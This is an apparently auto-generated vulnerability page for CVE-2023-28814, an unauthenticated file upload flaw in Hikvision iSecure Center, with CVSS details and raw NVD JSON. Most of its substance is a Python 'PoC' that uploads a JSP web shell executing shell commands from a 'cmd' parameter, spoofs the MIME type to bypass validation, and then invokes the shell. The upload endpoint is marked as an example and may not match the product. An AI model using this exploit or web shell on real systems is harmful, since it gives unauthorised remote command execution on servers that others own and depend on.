Security Vulnerability Report
CVE-2023-28814 CVSS 9.8 CRITICAL

CVE-2023-28814

Published: 2025-10-17 11:15:34
Last Modified: 2026-04-15 00:35:42

Description

Some versions of Hikvision's iSecure Center Product have an improper file upload control vulnerability. Due to the improper verification of file to be uploaded, attackers may upload malicious files to the server. iSecure Center is software released for China's domestic market only, with no overseas release.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hikvision iSecure Center: some earlier versions (for the specific affected versions, refer to Hikvision's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2023-28814 - Hikvision iSecure Center File Upload Exploit
# WARNING: This PoC is for educational and authorized testing purposes only

import requests
import sys

TARGET_URL = "https://target-host:port"
UPLOAD_PATH = "/center/api/files/upload"  # Example upload endpoint


def exploit(target_url, shell_content):
    """
    Exploit improper file upload vulnerability in Hikvision iSecure Center.
    The vulnerability allows uploading arbitrary files due to insufficient
    file type validation.
    """
    session = requests.Session()

    # Step 1: Attempt to access the upload endpoint without authentication
    # The vulnerability requires no authentication (PR:N)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "*/*",
        "Connection": "keep-alive"
    }

    # Step 2: Prepare malicious JSP web shell payload
    # JSP webshell to gain remote code execution on the server
    jsp_shell = b"""<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = br.readLine()) != null) {
        out.println(line);
    }
}
%>"""

    # Step 3: Construct the multipart file upload request
    # Bypass file type validation by manipulating filename and content-type
    files = {
        "file": (
            "shell.jsp",   # Filename with JSP extension
            jsp_shell,     # Malicious JSP content
            "image/jpeg",  # Spoofed MIME type to bypass validation
            {"Content-Disposition": "form-data; name=\"file\"; filename=\"shell.jsp\""}
        )
    }
    data = {
        "type": "image",
        "folder": "/upload/"
    }

    # Step 4: Send the upload request
    upload_url = target_url.rstrip("/") + UPLOAD_PATH
    print(f"[*] Attempting to upload webshell to: {upload_url}")

    try:
        response = session.post(
            upload_url,
            files=files,
            data=data,
            headers=headers,
            verify=False,
            timeout=30
        )
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: \n{response.text[:500]}")

        if response.status_code == 200:
            print("[+] Upload may have succeeded!")

            # Step 5: Try to access the uploaded webshell
            shell_url = target_url.rstrip("/") + "/upload/shell.jsp?cmd=id"
            print(f"[*] Attempting to access webshell at: {shell_url}")
            shell_response = session.get(shell_url, verify=False, timeout=10)
            print(f"[*] Shell Response: {shell_response.text[:500]}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")

    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://192.168.1.100:8443")
        sys.exit(1)

    target = sys.argv[1]
    exploit(target, None)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2023-28814",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-17T11:15:33.647",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Some versions of Hikvision's iSecure Center Product have an improper file upload control vulnerability. Due to the improper verification of file to be uploaded, attackers may upload malicious files to the server. iSecure Center is software released for China's domestic market only, with no overseas release."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-03/",
        "source": "[email protected]"
      }
    ]
  }
}
```